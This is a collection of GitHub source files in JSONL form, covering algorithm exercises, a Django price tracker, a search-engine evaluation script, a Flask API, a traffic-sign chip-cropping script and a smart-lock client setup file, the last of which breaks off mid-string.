+{"seq_id":"32142979999","text":"from typing import List\n\nclass Solution:\n def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:\n boxTypes.sort(key = lambda x:x[1], reverse = True)\n ans = 0\n for i in range(len(boxTypes)):\n size, unit = boxTypes[i]\n if truckSize >= size:\n truckSize -= size\n ans += unit * size\n else:\n ans += unit * truckSize\n break\n return ans\n\ns = Solution()\nboxTypes = [[1,3],[2,2],[3,1]]\ntruckSize = 4\nprint(s.maximumUnits(boxTypes, truckSize))","repo_name":"DingChiLin/AlgorithmSampleCode","sub_path":"Greedy/MaximumUnitsOnATruck.py","file_name":"MaximumUnitsOnATruck.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"73015191432","text":"from django.shortcuts 
import render,redirect\nfrom .forms import AddLinkForm\nfrom .models import Link\nfrom django.views import View\nfrom django.views.generic import DeleteView\nfrom django.urls import reverse_lazy\nfrom .utils import get_link_data\nfrom django.core.mail import EmailMessage\nfrom django.conf import settings\nfrom django.template.loader import render_to_string, get_template\nclass AddProduct(View):\n    def post(self, request):\n        postData = request.POST\n        url = postData.get('url')\n        no_discounted=0\n        name, current_price ,erro = get_link_data(url)\n        # c flags a missing login session, tp flags an unparsable target price\n        try:\n            c=0\n            customer=request.session['email']\n        except:\n            c=1\n            erro=1\n        target_price=postData.get('tp')\n        try:\n            tp=0\n            target_price=float(target_price)\n        except:\n            tp=1\n            erro = 1\n        nemail=False\n        qs = Link.objects.filter(customer=customer)\n        items_no = qs.count()\n        if items_no > 0:\n            discount_list = []\n            for item in qs:\n                if item.target_price > item.current_price:\n                    if nemail:\n                        pass\n                    else:\n                        # sending email\n                        email = EmailMessage(\n                            'Price Drop‼‼‼‼〽',\n                            f'Hello {customer} ,'\n                            f'Price reduced on product {item.name}'\n                            f'Target price :{item.target_price}'\n                            f'Current Price :{item.current_price}'\n                            f'Buy Now>>>>>> {item.url}'\n                            f'Ready to track another one!!!!',\n                            settings.EMAIL_HOST_USER,\n                            [nemail],\n                        )\n                        email.fail_silently = False\n                        email.send()\n                        discount_list.append(item)\n            no_discounted = len(discount_list)\n        if erro==0:\n            if current_price!=target_price:\n                price_diff=current_price-target_price\n                price_diff=round(price_diff, 2)\n            else:\n                price_diff = 0\n        else:\n            if tp==1:\n                error=\"Enter Correct Product Details\"\n            elif c==1:\n                error=\"Login To track a product\"\n            else:\n                error=\"Invalid URL or check if the product is in Offer or Not in Respective Ecommerce website\"\n            context = {\n                'qs': qs,\n                'items_no': items_no,\n                'no_discounted': no_discounted,\n                'error': error,\n            }\n            return render(request, 'links/pricetracker.html', context)\n\n        product=Link(\n            name=name,\n            url=url,\n            current_price=current_price,\n            target_price=target_price,\n            price_diff=price_diff,\n            nemail=nemail,\n            customer=customer\n        )\n        product.register()\n\n        return redirect('pt')\n\n\ndef targetprices(request):\n    postData = request.POST\n    no_discounted = 0\n    url = postData.get('url')\n    name, current_price, erro = get_link_data(url)\n    max_target =current_price-((20/100)*current_price)\n    min_target =current_price-((10/100)*current_price)\n    try:\n        c = 0\n        customer = request.session['email']\n    except:\n        c = 1\n        erro = 1\n    nemail = False\n    qs = Link.objects.filter(customer=customer)\n    items_no = qs.count()\n    if items_no > 0:\n        discount_list = []\n        for item in qs:\n            if item.target_price > item.current_price:\n                if nemail:\n                    pass\n                else:\n                    # sending email\n                    ctx = {\n                        'user_name': request.session['name'],\n                        'item_name':item.name,\n                        'item_target_price':item.target_price,\n                        'item_current_price':item.current_price,\n                        'item_url':item.url\n                    }\n                    message = get_template('pricereduceemail.html').render(ctx)\n                    email = EmailMessage(\n                        'Price Drop‼‼‼‼〽',\n                        message,\n                        settings.EMAIL_HOST_USER,\n                        [request.session['email']],\n                    )\n                    email.content_subtype = \"html\"\n                    email.fail_silently = False\n                    email.send()\n                    discount_list.append(item)\n        no_discounted = len(discount_list)\n    if erro == 0:\n        context = {\n            'qs': qs,\n            'items_no': items_no,\n            'no_discounted': no_discounted,\n            'max_target':max_target,\n            'min_target':min_target,\n            'url':url,\n            'for':'target',\n            'name':name,\n            'current_price':current_price\n        }\n    else:\n        if c == 1:\n            error = \"Login To track a product\"\n        else:\n            error = \"Invalid URL or check if the 
product is in Offer or Not in Respective Ecommerce website\"\n        context = {\n            'qs': qs,\n            'items_no': items_no,\n            'no_discounted': no_discounted,\n            'url':'',\n            'error': error,\n        }\n    return render(request, 'links/pricetracker.html', context)\n\n\ndef price_tracker(request):\n    qs = Link.objects.all()\n    for link in qs:\n        link.save()\n    no_discounted = 0\n    error = None\n    form = AddLinkForm(request.POST or None)\n\n    if request.method == 'POST':\n        try:\n            if form.is_valid():\n                form.save()\n        except AttributeError:\n            error = \"Oops! No product found. Check the link \"\n        except:\n            error = \"Check the URL \"\n    customer = request.session['email']\n    form = AddLinkForm()\n    qs = Link.objects.filter(customer=customer)\n    items_no = qs.count()\n    if items_no > 0:\n        discount_list = []\n        for item in qs:\n            if item.target_price > item.current_price:\n                if item.nemail:\n                    pass\n                else:\n                    ctx = {\n                        'user_name': request.session['name'],\n                        'item_name': item.name,\n                        'item_target_price': item.target_price,\n                        'item_current_price': item.current_price,\n                        'item_url': item.url\n                    }\n                    message = get_template('pricereduceemail.html').render(ctx)\n                    email = EmailMessage(\n                        'Price Drop‼‼‼‼〽',\n                        message,\n                        settings.EMAIL_HOST_USER,\n                        [request.session['email']],\n                    )\n                    email.content_subtype = \"html\"\n                    email.fail_silently = False\n                    email.send()\n                    up=Link.objects.filter(name=item.name)\n                    for o in up:\n                        o.nemail=True\n                        o.save()\n                    discount_list.append(item)\n        no_discounted = len(discount_list)\n    context = {\n        'qs': qs,\n        'items_no': items_no,\n        'no_discounted': no_discounted,\n        'form': form,\n        'error': error,\n    }\n\n    return render(request, 'links/pricetracker.html', context)\n\n\nclass LinkDeleteView(DeleteView):\n    model = Link\n    template_name = 'links/confirm_del.html'\n    success_url = reverse_lazy('pt')\n\n\ndef update_price(request):\n    qs = Link.objects.all()\n    for link in qs:\n        link.save()\n    return redirect('pt')\n\n","repo_name":"GOLLAPROLU-VENKATESH/E-Deals","sub_path":"price_tracker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"22718481618","text":"import string\nimport unittest\n\nimport steampi\n\n\nclass TestUtilsMethods(unittest.TestCase):\n    def test_build_lower_case_game_name_dictionary(self):\n        lower_case_game_name_dictionary = (\n            steampi.build_lower_case_game_name_dictionary()\n        )\n\n        assert len(lower_case_game_name_dictionary) > 0\n\n    def test_remove_characters_from_str(self):\n        input_str = 'Hello, World!'\n        characters_to_remove = string.punctuation\n\n        edited_str = steampi.remove_characters_from_str(\n            input_str=input_str,\n            characters_to_remove=characters_to_remove,\n        )\n\n        assert edited_str == 'Hello World'\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"woctezuma/steampi","sub_path":"steampi/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"40322153835","text":"from information import InformationRetrieval\nfrom similarity import Similarity\nfrom evaluation import Evaluation\nfrom preprocessing import Preprocessing\nfrom util import * \nfrom config import *\n\nfrom sys import version_info\nimport argparse\nimport json\nimport pdb\nimport numpy as np\nimport time\n\nclass SearchEngine:\n\n\tdef __init__(self, args):\n\t\tself.args = args\n\t\tself.preprocess = Preprocessing()\n\t\tself.informationRetriever = 
InformationRetrieval(self.args)\n\t\tself.similarity = Similarity()\n\t\tself.evaluator = Evaluation()\n\n\n\tdef preprocessQueries(self, queries):\n\n\t\t################# Segment queries ################\n\n\t\tsegmentedQueries = []\n\t\tfor query in queries:\n\t\t\tsegmentedQuery = self.preprocess.sentenceSegmentation(query)\n\t\t\tsegmentedQueries.append(segmentedQuery)\n\t\tjson.dump(segmentedQueries, open(self.args.out_folder + \"segmented_queries.txt\", 'w'))\n\n\t\t################## Tokenize queries #################\n\n\t\ttokenizedQueries = []\n\t\tfor query in segmentedQueries:\n\t\t\ttokenizedQuery = self.preprocess.tokenization(query, self.args)\n\t\t\ttokenizedQueries.append(tokenizedQuery)\n\t\tjson.dump(tokenizedQueries, open(self.args.out_folder + \"tokenized_queries.txt\", 'w'))\n\t\t\n\t\t################### Stem/Lemmatize queries #################\n\n\t\treducedQueries = []\n\t\tfor query in tokenizedQueries:\n\t\t\treducedQuery = self.preprocess.reduction(query)\n\t\t\treducedQueries.append(reducedQuery)\n\t\tjson.dump(reducedQueries, open(self.args.out_folder + \"reduced_queries.txt\", 'w'))\n\t\t\n\t\t#################### Remove stopwords from queries #################\n\n\t\tstopwordRemovedQueries = []\n\t\tfor query in reducedQueries:\n\t\t\tstopwordRemovedQuery = self.preprocess.stopwordremove(query)\n\t\t\tstopwordRemovedQueries.append(stopwordRemovedQuery)\n\t\tjson.dump(stopwordRemovedQueries, open(self.args.out_folder + \"stopword_removed_queries.txt\", 'w'))\n\n\t\tpreprocessedQueries = stopwordRemovedQueries\n\t\treturn preprocessedQueries\n\n\n\tdef preprocessDocs(self, docs):\n\n\t\t####################### Segment docs #########################\n\t\t# \n\n\t\tsegmentedDocs = []\n\t\tfor doc in docs:\n\t\t\tsegmentedDoc = self.preprocess.sentenceSegmentation(doc)\n\t\t\tsegmentedDocs.append(segmentedDoc)\n\t\tjson.dump(segmentedDocs, open(self.args.out_folder + \"segmented_docs.txt\", 'w'))\n\t\t\n\t\t####################### Tokenize docs ##########################\n\n\t\ttokenizedDocs = []\n\t\tfor doc in segmentedDocs:\n\t\t\ttokenizedDoc = self.preprocess.tokenization(doc,self.args)\n\t\t\ttokenizedDocs.append(tokenizedDoc)\n\t\tjson.dump(tokenizedDocs, open(self.args.out_folder + \"tokenized_docs.txt\", 'w'))\n\n\t\t####################### Stem/Lemmatize docs ########################\n\n\t\treducedDocs = []\n\t\tfor doc in tokenizedDocs:\n\t\t\treducedDoc = self.preprocess.reduction(doc)\n\t\t\treducedDocs.append(reducedDoc)\n\t\tjson.dump(reducedDocs, open(self.args.out_folder + \"reduced_docs.txt\", 'w'))\n\t\t\n\t\t########################## Remove stopwords from docs #############################\n\n\t\tstopwordRemovedDocs = []\n\t\tfor doc in reducedDocs:\n\t\t\tstopwordRemovedDoc = self.preprocess.stopwordremove(doc)\n\t\t\tstopwordRemovedDocs.append(stopwordRemovedDoc)\n\t\tjson.dump(stopwordRemovedDocs, open(self.args.out_folder + \"stopword_removed_docs.txt\", 'w'))\n\n\t\tpreprocessedDocs = stopwordRemovedDocs\n\t\treturn preprocessedDocs\n\n\tdef evaluateDataset(self):\n\t\t\"\"\"\n\t\t- preprocesses the queries and documents, stores in output folder\n\t\t- invokes the IR system\n\t\t- evaluates precision, recall, fscore, nDCG and MAP \n\t\t for all queries in the Cranfield dataset\n\t\t- produces graphs of the evaluation metrics in the output folder\n\t\t\"\"\"\n\t\targs =self.args\n\n\t\t########################## Read queries ##########################\n\n\t\tqueries_json = json.load(open(args.dataset + \"cran_queries.json\", 
'r'))[:]\n\t\tquery_ids, queries = [item[\"query number\"] for item in queries_json], \\\n\t\t\t\t\t\t\t\t[item[\"query\"] for item in queries_json]\n\t\t\t\t\t\t\t\t\n\t\t########################## Process queries ########################## \n\n\t\tprocessedQueries = self.preprocessQueries(queries)\n\n\t\t# ########################## Read documents ##########################\n\n\t\tdocs_json = json.load(open(args.dataset + \"cran_docs.json\", 'r'))[:]\n\n\t\t########################## BUILD DATASET FOR LSA ###########################\n\n\t\tif args.method in [\"Wordnet_QE\",\"TFIDF\"]:\n\t\t\tcorpus = get_corpus(corpus=args.corpus)\n\t\t\tprocessed_corpus = self.preprocessDocs(corpus)\n\t\t\tself.informationRetriever.wordnet(args,processed_corpus)\n\n\t\telif args.method == \"LSA\" or args.method == \"Combined\":\t\t\t\n\t\t\tcorpus = get_corpus(corpus=args.corpus)\n\t\t\tprocessed_corpus = self.preprocessDocs(corpus)\n\t\t\tself.informationRetriever.LSA( args, processed_corpus)\n\t\t\t\n\n\t\t########################## Build document index ##########################\n\n\t\tdoc_tfidf, query_tfidf = self.informationRetriever.vectorize_queries(processedQueries)\n\n\t\t###################### Rank the documents for each query ##########################\n\n\t\tself.similarity.find_similarity(doc_tfidf, query_tfidf, method = self.args.method)\n\t\tdoc_IDs_ordered = self.similarity.Rank()\n\n\t\t###################### Read relevance judements ##########################\n\n\t\tqrels = json.load(open(args.dataset + \"cran_qrels.json\", 'r'))[:]\n\n\t\t######## Calculate precision, recall, f-score, MAP and nDCG for k ##########\n\n\t\tprecisions, recalls, fscores, MAPs, nDCGs, x = [], [], [], [], [], []\n\t\t\n\t\tfor k in range(1, 11, 1):\n\t\t\tx.append(k)\n\t\t\tprecision = self.evaluator.meanPrecision(\n\t\t\t\tdoc_IDs_ordered, query_ids, qrels, k)\n\t\t\tprecisions.append(precision)\n\t\t\trecall = self.evaluator.meanRecall(\n\t\t\t\tdoc_IDs_ordered, query_ids, qrels, k)\n\t\t\trecalls.append(recall)\n\t\t\tfscore = self.evaluator.meanFscore(\n\t\t\t\tdoc_IDs_ordered, query_ids, qrels, k)\n\t\t\tfscores.append(fscore)\n\t\t\tMAP = self.evaluator.meanAveragePrecision(\n\t\t\t\tdoc_IDs_ordered, query_ids, qrels, k)\n\t\t\tMAPs.append(MAP)\n\t\t\tnDCG, query_scores = self.evaluator.meanNDCG(\n\t\t\t\tdoc_IDs_ordered, query_ids, qrels, k)\n\t\t\tnDCGs.append(nDCG)\n\t\tprint(\" Following metrics are averaged over k = 1 to 10 \")\n\t\tprint(\" nDCG : \", np.round(np.mean(nDCGs),3), end = \"\\t\")\n\t\tprint(\" MAP : \", np.round(np.mean(MAPs),3), end = \"\\t\")\n\t\tprint(\" Precision : \", np.round(np.mean(precisions),3), end = \"\\t\")\n\t\tprint(\" Recall : \", np.round(np.mean(recalls),3), end = \"\\t\")\n\t\tprint(\" F-score : \",np.round( np.mean(fscores),3), end = \"\\t\")\n\t\tprint(\"\\n For k = 1 \")\n\t\tprint(\" nDCG : \", np.round(nDCGs[0],3), end = \"\\t\")\n\t\tprint(\" MAP : \", np.round(MAPs[0],3), end = \"\\t\")\n\t\tprint(\" Precision : \", np.round(precisions[0],3), end = \"\\t\")\n\t\tprint(\" Recall : \", np.round(recalls[0],3), end = \"\\t\")\n\t\tprint(\" F-score : \",np.round( fscores[0],3)\t)\n\n\t\t############# Plot the metrics and save plot ######################\n\n\t\tplt.plot(x, precisions, label=\"Precision\")\n\t\tplt.plot(x, recalls, label=\"Recall\")\n\t\tplt.plot(x, fscores, label=\"F-Score\")\n\t\tplt.plot(x, MAPs, label=\"MAP\")\n\t\tplt.plot(x, nDCGs, label=\"nDCG\")\n\t\tplt.legend()\n\t\tplt.title(\"Evaluation Metrics - Cranfield 
Dataset\")\n\t\tplt.xlabel(\"k\")\n\t\tplt.savefig(args.out_folder + \"eval_plot.png\")\n\n\t\treturn [query_scores,doc_IDs_ordered, nDCGs, MAPs, precisions, recalls, fscores]\n\n\n\nif __name__ == \"__main__\":\n\n\tstart_time = time.time()\n\n\t# Create an argument parser\n\tparser = argparse.ArgumentParser(description='main.py')\n\n\t# Tunable parameters as external arguments\n\tparser.add_argument('--dataset', default = DATASET_DIRECTORY, help = \"Path to the dataset folder\")\n\tparser.add_argument('--out_folder', default = \"output/\", help = \"Path to output folder\")\n\tparser.add_argument('--segmenter', default = \"punkt\",help = \"Sentence Segmenter Type [naive|punkt]\")\n\tparser.add_argument('--tokenizer', default = \"ptb\",help = \"Tokenizer Type [naive|ptb]\")\n\tparser.add_argument(\"--corpus\",type = str, default = \"cranfield\", help= \"Corpus used for training\")\n\t#choices = [\"cranfield\",\"20newsgroup\",\"books\"])\n\tparser.add_argument(\"--restrict_tokenization\", type = str2bool, default = False, help = \"Use only isalnum(True) or normal tokenization(False)\")\n\tparser.add_argument(\"--max_dim\", type = int, default = 1000, help = \"Maximum no of cordinates to be used (LSA)\" )\n\tparser.add_argument(\"--max_ngram\", type = int, default = 1, help = \"Maximum limit of Ngram. If 2 countvectorizer contains both unigrams and bigrams\")\n\tparser.add_argument(\"--method\", type = str, default = 'LSA', help = \"Algorithm for IR\", choices =['LSA','Wordnet_QE','Combined','TFIDF'])\n\t# Wordnet_QE => Query expansion based on WordNet\n\t# LSA \t\t => Latent Semantic Analysis\n\t# Combined => Combined LSA + Wordnet_QE\t\n\tparser.add_argument(\"--wordnet_weight\", type = int, default = 1, help = \"Weight of actual word compared to appended words (WordNet_QE)\" )\n\t\n\targs = parser.parse_args()\n\tprint(\"\\nCorpus :\",args.corpus, end = \"\\t\")\n\tprint(\"Restrictin Tokenization : \",args.restrict_tokenization, end = \"\\t\")\n\tprint(\"Maximum dimension : \",args.max_dim, end = \"\\t\")\n\tprint(\"Tokenizer : \",args.tokenizer, end = \"\\t\")\n\tprint(\"Segmenter : \",args.segmenter, end = \"\\t\")\n\tprint(\"Algorithm : \",args.method)\n\n\tif not os.path.exists(args.out_folder):\n\t\tos.mkdir(args.out_folder)\n\n\t# Create an instance of the Search Engine\n\tsearchEngine = SearchEngine(args)\n\n\tsearchEngine.evaluateDataset()\n\n\tprint(\"Total time taken : \",time.time() - start_time)\n\t# Run - python main.py --corpus=cranfield --method=wordnet2 --use_svd=True --restrict_tokenization=False --max_dim=600 --max_ngram=1 --top_n=1\n","repo_name":"kr-hari/Information-Retrieval-using-LSA-and-Query-expansion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2290032691","text":"from os.path import basename, splitext\nfrom flask import Blueprint\nfrom flask.ext.restful import Api, marshal_with, Resource\nfrom tabs import api, db\nfrom tabs.database import News, Updates, Users\nfrom tabs.forms import NewsForm, UpdateForm, UserForm\nfrom tabs.serializers import news_fields, update_fields, user_fields\n\n__version__ = splitext(basename(__file__))[0]\nmod = Blueprint('api', __name__, url_prefix='/api/%s' % __version__)\napi = Api(mod)\n\n# NEED TO GENERALIZE THIS STUFF\n\n\n\n# # working?\n# class AddProject(Resource):\n# form = ProjectForm()\n# if not form.validate_on_submit():\n# return form.errors, 422\n\n# project = 
Projects(form.name.data, form.user_id.data)\n# db.session.add(project)\n# db.session.commit()\n# return ProjectSerializer(project).data\n\n\n# # working?\n# class AddSample(Resource):\n# form = SampleForm()\n# if not form.validate_on_submit():\n# return form.errors, 422\n\n# sample = Samples(form.name.data, project)\n# db.session.add(sample)\n# db.session.commit()\n# return SampleSerializer(sample).data\n\n\n# # working?\n# class AddSequencing(Resource):\n# form = SequengingForm()\n# if not form.validate_on_submit():\n# return form.errors, 422\n\n# sequencing = Sequencing()\n# db.session.add(sequencing)\n# db.session.commit()\n# return SequencingSerializer(sequencing).data\n\n\n# working?\nclass UpdateEndpoint(Resource):\n @marshal_with(update_fields)\n def get(self):\n updates = Updates.query.all()\n return updates\n\n @marshal_with(update_fields)\n def post(self):\n form = UpdateForm()\n if not form.validate_on_submit():\n return form.errors, 422\n\n update = Updates(form.title.data, form.body.data, form.user_id.data)\n db.session.add(update)\n db.session.commit()\n return update\n\n\nclass UserEndpoint(Resource):\n @marshal_with(user_fields)\n def get(self):\n users = Users.query.all()\n return users\n\n @marshal_with(user_fields) \n def post(self):\n form = UserForm()\n if not form.validate_on_submit():\n return form.errors, 422\n\n user = Users(form.name.data, form.email.data)\n db.session.add(user)\n db.session.commit()\n return user\n\n\n# combined?\n# working?\nclass NewsEndpoint(Resource):\n @marshal_with(news_fields)\n def get(self):\n news = News.query.all()\n return news\n\n @marshal_with(news_fields)\n def post(self):\n form = NewsForm()\n if not form.validate_on_submit():\n return form.errors, 422\n\n news = News(form.title.data, form.body.data, form.user_id.data)\n db.session.add(news)\n db.session.commit()\n return news\n\n\napi.add_resource(UserEndpoint, \"/users\")\napi.add_resource(NewsEndpoint, \"/news\")\napi.add_resource(UpdateEndpoint, \"/updates\")\n","repo_name":"keeklund-zz/tabs","sub_path":"tabs/api/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70911870473","text":"def quickSort(arr):\r\n \"\"\"Apply quick sort on the given array\r\n\r\n :param arr: the array to sort\r\n :type arr: list\r\n \"\"\"\r\n less = []\r\n pivotList = []\r\n more = []\r\n if len(arr) <= 1:\r\n return arr\r\n else:\r\n pivot = arr[0]\r\n for i in arr:\r\n if i < pivot:\r\n less.append(i)\r\n elif i > pivot:\r\n more.append(i)\r\n else:\r\n pivotList.append(i)\r\n less = quickSort(less)\r\n more = quickSort(more)\r\n return less + pivotList + more\r\n\r\n# Unit test\r\na = [4, 65, 2, -31, 0, 99, 83, 782, 1] # The array to sort\r\na = quickSort(a)\r\nassert all(a[i] <= a[i+1] for i in range(len(a)-1)) # Assert array is sorted\r\n\r\n# Quick sort: Quicksort is a comparison sort, meaning that it can \r\n# sort items of any type for which a \"less-than\" relation is defined. \r\n# In efficient implementations it is not a stable sort, meaning \r\n# that the relative order of equal sort items is not preserved. \r\n# Quicksort can operate in-place on an array, requiring small \r\n# additional amounts of memory to perform the sorting. 
It is very \r\n# similar to selection sort, except that it does not always choose \r\n# worst-case partition.\r\n","repo_name":"codezoned/ScriptsDump","sub_path":"Arrays-Sorting/src/Quick_sort/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"27"} +{"seq_id":"27904215194","text":"\"\"\"Asks the user for height, authorizes or not the sale of the ticket, calculates \nthe value considering age and added a photo and returns the total value of the ticket\"\"\"\n\n# rollercoaster\nprint(\"Welcome to the rollercoaster!\")\n\nheight = int(input(\"What's your height in cm?\\n\"))\nbill = 0\n\n# check minimum height\nif height >= 120:\n print(\"You can ride the rollercoaster!\")\n\n age = int(input(\"What's your age? \"))\n\n # check ticket value\n if age < 12:\n print(\"Child tickets are $5.\")\n bill += 5\n elif age <= 18:\n print(\"Youth tickets are $7.\")\n bill += 7\n elif age >= 45 and age <= 55:\n print(\"Your tickets are $0\")\n else:\n print(\"Adult tickets are $12.\")\n bill += 12\n\n # check if there is a request for a photo\n wants_photo = input(\"Do you have a photo? Y or N: \").upper()\n if wants_photo == \"Y\":\n bill += 3\n\nelse:\n print(\"Sorry, you can't ride the rollercoaster!\")\n\nprint(f'The total of your ticket is ${bill}')\n","repo_name":"rafaelciriello/exercises_100_days_of_code","sub_path":"5_rollercoaster.py","file_name":"5_rollercoaster.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5190398574","text":"import datetime\nfrom hyperparameter import Hyperparameter\nfrom sample import Sample\nfrom typing import Dict, Iterable, List\n\n\nclass TrainingData:\n \"\"\"Represents TrainingData and methods to load, test and classify it.\"\"\"\n\n def __init__(self, name: str) -> None:\n self.name = name\n self.uploaded: datetime.datetime\n self.tested: datetime.datetime\n self.training: List[Sample] = []\n self.testing: List[Sample] = []\n self.tuning: List[Hyperparameter]\n\n def load(self, raw_data_source: Iterable[Dict[str, str]]) -> None:\n # Instead of opening and reading a file in this method, it is\n # better to abstract it out to not bind the class to a specific\n # file type. 
In this way details of the file format will be\n # isolated from details of managing the data\n self.uploaded = datetime.datetime.today()\n\n def test(self, hyperparameters: Hyperparameter) -> None:\n hyperparameters.test()\n self.tuning.append(hyperparameters)\n self.tested = datetime.datetime.today()\n\n def classify(self, hyperparameters: Hyperparameter, sample: Sample) -> None:\n classification = hyperparameters.classify(Sample)\n sample.classify(classification)\n return sample\n","repo_name":"Tolga-Karahan/Studies","sub_path":"programming-languages/Python/object-oriented/use-case-implementation/training_data.py","file_name":"training_data.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20883237366","text":"# -*- coding: utf-8 -*-\n\nimport os, sys\nimport cv2\nimport glob\nimport json\nimport random\nimport numpy as np\nfrom tqdm import tqdm\nfrom operator import add\nimport utils\nimport pdb\n\nrandom.seed(100)\nhome = os.path.expanduser('~')\nroot_datadir = os.path.join(home, 'data/dfsign')\nsrc_traindir = root_datadir + '/train'\nsrc_testdir = root_datadir + '/test'\nsrc_annotation = root_datadir + '/train_label_fix.csv'\n\nold_datadir = root_datadir + '/dfsign_chip_voc'\nold_anno_dir = old_datadir + '/Annotations'\n\ndest_datadir = root_datadir + '/dfsign_detect_voc'\nimage_dir = dest_datadir + '/JPEGImages'\nlist_dir = dest_datadir + '/ImageSets/Main'\nanno_dir = dest_datadir + '/Annotations'\n\nloc_json = os.path.join(old_anno_dir, 'test_chip.json')\ndetect_json = os.path.join(home,\n 'working/dfsign/mmdetection/dfsign/results_chip.json')\n\ndef main():\n if not os.path.exists(dest_datadir):\n os.mkdir(dest_datadir)\n os.mkdir(image_dir)\n os.makedirs(list_dir)\n os.mkdir(anno_dir)\n\n # read chip loc\n with open(loc_json, 'r') as f:\n chip_loc = json.load(f)\n # read chip detections\n with open(detect_json, 'r') as f:\n chip_detect = json.load(f)\n\n dfsign_results = []\n for chip_id, chip_result in chip_detect.items():\n chip_id = os.path.basename(chip_id)\n img_id = chip_id.split('_')[0] + '.jpg'\n\n loc = chip_loc[chip_id]['loc']\n for i, pred_box in enumerate(chip_result['pred_box']):\n # transform to orginal image\n # ratio = (loc[2] - loc[0]) / 416.\n pred_box = [pred_box[0] + loc[0],\n pred_box[1] + loc[1],\n pred_box[2] + loc[0],\n pred_box[3] + loc[1]]\n sign_type = int(chip_result['pred_label'][i])\n score = chip_result['pred_score'][i]\n dfsign_results.append([img_id] + pred_box + [sign_type, score])\n \n filter_results = []\n temp = np.array(dfsign_results)\n detected_img = np.unique(temp[:, 0])\n for img_id in detected_img:\n preds = temp[temp[:, 0] == img_id]\n preds = preds[preds[:, -1].argsort()]\n filter_results.append(list(preds[-1])[:-1])\n\n chip_loc = {}\n chip_name_list = []\n for result in tqdm(filter_results):\n imgid = result[0][:-4]\n\n box = [float(x) for x in result[1:5]]\n box_w = box[2] - box[0]\n box_h = box[3] - box[1]\n\n if max(box_w, box_h) < 25:\n ratio_list = [4.5, 4.8, 5.2, 5.5]\n elif max(box_w, box_h) < 28:\n ratio_list = [4.5, 4.8, 5.2, 5.5] \n elif max(box_w, box_h) < 100:\n ratio_list = [3.5, 3.8, 4.2, 4.5]\n else:\n ratio_list = [3.5, 3.8, 4.2]\n\n chip_list = []\n for ratio in ratio_list:\n region_w = max(box_w, box_h) * ratio\n region_h = region_w\n center_x = box[0] + box_w / 2.0\n center_y = box[1] + box_h / 2.0\n region = [center_x - region_w / 2, \n center_y - region_h / 2,\n center_x + region_w / 2,\n center_y + region_h 
/ 2]\n shift_x = max(0, 0 - region[0]) + min(0, 3200 - 1 - region[2])\n shift_y = max(0, 0 - region[1]) + min(0, 1800 - 1 - region[3])\n chip = [region[0] + shift_x,\n region[1] + shift_y,\n region[2] + shift_x,\n region[3] + shift_y]\n chip = [int(x) for x in chip]\n chip_list.append(chip)\n\n origin_img = cv2.imread(os.path.join(src_testdir, '%s.jpg'%imgid))\n for i, chip in enumerate(chip_list):\n chip_img = origin_img[chip[1]:chip[3], chip[0]:chip[2], :].copy()\n chip_name = '%s_%d' % (imgid, i)\n cv2.imwrite(os.path.join(image_dir, '%s.jpg'%chip_name), chip_img)\n chip_name_list.append(chip_name)\n\n chip_info = {'loc': chip}\n chip_loc[chip_name] = chip_info\n\n # write test txt\n with open(os.path.join(list_dir, 'test.txt'), 'w') as f:\n f.writelines([x+'\\n' for x in chip_name_list])\n print('write txt.')\n\n # write chip loc json\n with open(os.path.join(anno_dir, 'test_chip.json'), 'w') as f:\n json.dump(chip_loc, f)\n print('write json.')\n\nif __name__ == '__main__':\n main()\n","repo_name":"qixuxiang/dfsign","sub_path":"tools/generate_detect_chip.py","file_name":"generate_detect_chip.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"27"} +{"seq_id":"4709275938","text":"# coding: utf-8\n\n\"\"\"\n Version 3 of CANDY HOUSE’s Sesame API\n\n We use RESTful API to provide basic manipulation of the Sesame smart lock, including: * Get Sesame lock/unlock status * Get battery status * Lock and unlock Sesame * Sync Sesame status * Get results for lock, unlock, and sync commands # noqa: E501\n\n The version of the OpenAPI document: 3.0.0\n Contact: sesame@candyhouse.co\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nfrom setuptools import setup, find_packages # noqa: H301\n\nNAME = \"sesame-client\"\nVERSION = \"1.0.0\"\n# To install the library, run the following\n#\n# python setup.py install\n#\n# prerequisite: setuptools\n# http://pypi.python.org/pypi/setuptools\n\nREQUIRES = [\"urllib3 >= 1.15\", \"six >= 1.10\", \"certifi\", \"python-dateutil\"]\n\nsetup(\n name=NAME,\n version=VERSION,\n description=\"Version 3 of CANDY HOUSE’s Sesame API\",\n author_email=\"sesame@candyhouse.co\",\n url=\"\",\n keywords=[\"OpenAPI\", \"OpenAPI-Generator\", \"Version 3 of CANDY HOUSE’s Sesame API\"],\n install_requires=REQUIRES,\n packages=find_packages(),\n include_package_data=True,\n long_description=\"\"\"\\\n We use RESTful API to provide basic manipulation of the Sesame smart lock, including: * Get Sesame lock/unlock status * Get battery status * Lock and unlock Sesame * Sync Sesame status * Get results for lock, unlock, and sync commands # noqa: E501\n 